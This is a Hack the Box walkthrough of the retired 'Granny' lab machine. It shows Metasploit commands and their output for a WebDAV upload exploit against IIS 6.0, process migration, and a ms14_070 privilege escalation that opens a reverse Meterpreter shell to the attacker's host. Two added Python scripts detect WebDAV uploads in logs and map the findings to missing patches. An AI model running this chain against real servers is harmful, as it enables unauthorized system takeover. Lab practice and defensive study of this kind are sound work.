Hack the Box – Granny Walkthrough

Today we’re going to solve another CTF machine, “Granny”. It is now a retired box and is accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Windows
  • Services: HTTP
  • IP Address: 10.10.10.15
  • Difficulty: Easy

Weakness

  • Microsoft IIS version 6.0
  • ms15_051_client_copy_image

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we identify the target to see what is behind the IP address. After an intense scan of TCP and UDP ports we found nothing but a single open port, TCP 80, which the scan reports as IIS httpd 6.0.

After some research we found a remote code execution vulnerability for this version.

Exploitation

Since we have found our vulnerability, let’s try to exploit it with the following Metasploit module.

exploit/windows/iis/iis_webdav_upload_asp

After executing the exploit we instantly got the shell.
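As an added, defensive-side example (not part of the original walkthrough): a small Python detector over constructed IIS 6.0 W3C log lines. It flags accepted WebDAV write methods and a script file requested by a client right after a MOVE/COPY, which is the trace a WebDAV upload of a server-side script like the one above leaves in the web server log. The log lines, paths and IPs are constructed for the example.

```python
"""Flag WebDAV write activity and follow-up script requests in IIS 6.0 W3C logs."""
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".asax", ".ashx", ".cer", ".cdx")

# Constructed sample in IIS 6.0 W3C extended format (not a log taken from the box).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2018-11-28 22:30:01 10.10.10.15 GET /iisstart.htm - 80 - 10.10.14.4 Mozilla/5.0 200 0 0
2018-11-28 22:30:02 10.10.10.15 OPTIONS / - 80 - 10.10.14.4 Mozilla/5.0 200 0 0
2018-11-28 22:30:03 10.10.10.15 PUT /upload.txt - 80 - 10.10.14.4 Mozilla/5.0 201 0 0
2018-11-28 22:30:04 10.10.10.15 MOVE /upload.txt - 80 - 10.10.14.4 Mozilla/5.0 201 0 0
2018-11-28 22:30:05 10.10.10.15 GET /upload.asp - 80 - 10.10.14.4 Mozilla/5.0 200 0 0
2018-11-28 22:30:06 10.10.10.15 PUT /readme.txt - 80 - 10.10.14.4 Mozilla/5.0 403 0 0
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the last #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            parts = line.split()
            if len(parts) == len(fields):  # W3C fields are space-separated, so counts must agree
                yield dict(zip(fields, parts))


def find_webdav_writes(text):
    """Return (time, client, message) alerts: accepted write methods, and a script file
    fetched by a client that had just renamed/copied something via WebDAV."""
    alerts = []
    last_rename = {}  # client IP -> the most recent MOVE/COPY record from that client
    for rec in parse_w3c(text):
        method, uri, client = rec["cs-method"], rec["cs-uri-stem"].lower(), rec["c-ip"]
        if method in WRITE_METHODS and rec["sc-status"].startswith("2"):
            alerts.append((rec["time"], client, f"WebDAV {method} accepted for {uri}"))
            if method in ("MOVE", "COPY"):
                last_rename[client] = rec
        elif method == "GET" and uri.endswith(SCRIPT_EXTS) and client in last_rename:
            prev = last_rename[client]
            alerts.append((rec["time"], client,
                           f"script {uri} requested after {prev['cs-method']} of {prev['cs-uri-stem']}"))
    return alerts


if __name__ == "__main__":
    for when, who, what in find_webdav_writes(SAMPLE_LOG):
        print(when, who, what)
```

The rejected PUT (403) is deliberately not alerted, so the rule only fires where the server actually accepted a write; on a server where WebDAV write methods are disabled the first two alerts never appear.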

Privilege Escalation

We have user access; the next goal is NT AUTHORITY. At this point we can’t even run getuid in our shell, so we background it and use the post/windows/manage/migrate module.

This module spawns a notepad.exe process and migrates our shell into it. All we need to give it is the ID of the session we backgrounded earlier.

msf exploit(iis_webdav_upload_asp) > use post/windows/manage/migrate
msf post(migrate) > show options

Module options (post/windows/manage/migrate):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   KILL     false            no        Kill original process for the session.
   NAME                      no        Name of process to migrate to.
   PID                       no        PID of process to migrate to.
   SESSION                   yes       The session to run this module on.
   SPAWN    true             no        Spawn process to migrate to. If name for process not given notepad.exe is used.

msf post(migrate) > set SESSION 1
SESSION => 1
msf post(migrate) > run

[*] Running module against GRANNY
[*] Current server process: svchost.exe (2624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 228
[+] Successfully migrated to process 228
[*] Post module execution completed
msf post(migrate) >

It worked anyway!

msf post(migrate) > sessions 1
[*] Starting interaction with 1…

meterpreter > sysinfo
Computer        : GRANNY
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter >

At this point it is a good idea to migrate to a process running under NT AUTHORITY\NETWORK SERVICE. In this case davcdata.exe seemed to be the only stable process available. The intended exploit in this case is ms15_051_client_copy_image, which immediately grants a root shell.

meterpreter > background
[*] Backgrounding session 1…
msf post(migrate) > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(local_exploit_suggester) >

Running this module produces a list of local exploits the machine appears to be vulnerable to.

msf post(local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows…
[*] 10.10.10.15 - 38 exploit checks are being tried…
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

So now we have to test each suggested exploit to see which one actually works.

I found this one useful.

msf post(migrate) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf exploit(ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Storing the shellcode in memory…
[*] Triggering the vulnerability…
[*] Checking privileges after exploitation…
[+] Exploitation successful!
[*] Sending stage (179267 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.4:4444 -> 10.10.10.15:1734) at 2018-11-28 23:38:41 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
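The suggester output above, triaged from the patching side, as an added example that is not from the original post: it parses the findings and maps each confirmed module to the Microsoft hotfix that closes it, so a defender can compare against the host's installed KB list instead of trying every exploit. The bulletin-to-KB table and the installed-hotfix set are my assumptions for this example; confirm the table against the bulletins before acting on it.

```python
"""Triage local_exploit_suggester findings into the patches that would close them."""
import re

# Module name -> (bulletin, hotfix KB). Taken from the Microsoft bulletins for these
# modules; treat it as an assumption and confirm against the bulletin before acting on it.
PATCH_FOR = {
    "ms14_058_track_popup_menu": ("MS14-058", "KB3000061"),
    "ms14_070_tcpip_ioctl": ("MS14-070", "KB2989935"),
    "ms15_051_client_copy_image": ("MS15-051", "KB3045171"),
    "ms16_016_webdav": ("MS16-016", "KB3136041"),
    "ms16_032_secondary_logon_handle_privesc": ("MS16-032", "KB3143141"),
}

FINDING_RE = re.compile(r"\[\+\] \S+ - exploit/windows/local/(\S+): (.+)")

# The suggester lines from the walkthrough above, embedded as sample input.
SUGGESTER_OUTPUT = """\
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
"""


def parse_suggester(output):
    """Split findings into modules the check confirmed and ones it could not validate."""
    confirmed, unvalidated = [], []
    for line in output.splitlines():
        m = FINDING_RE.search(line)
        if m:
            module, verdict = m.groups()
            (confirmed if "appears to be vulnerable" in verdict else unvalidated).append(module)
    return confirmed, unvalidated


def missing_patches(modules, installed_kbs):
    """For each module, name the bulletin/KB that is not installed, or flag it for manual review."""
    gaps = {}
    for module in modules:
        bulletin, kb = PATCH_FOR.get(module, (None, None))
        if kb is None:
            gaps[module] = "no patch mapping in this table; review manually"
        elif kb not in installed_kbs:
            gaps[module] = f"{bulletin} ({kb}) not installed"
    return gaps


if __name__ == "__main__":
    confirmed, unvalidated = parse_suggester(SUGGESTER_OUTPUT)
    # Constructed hotfix list; on a real host it would come from `wmic qfe get HotFixID`.
    for module, why in missing_patches(confirmed, {"KB2989935"}).items():
        print(module, "->", why)
```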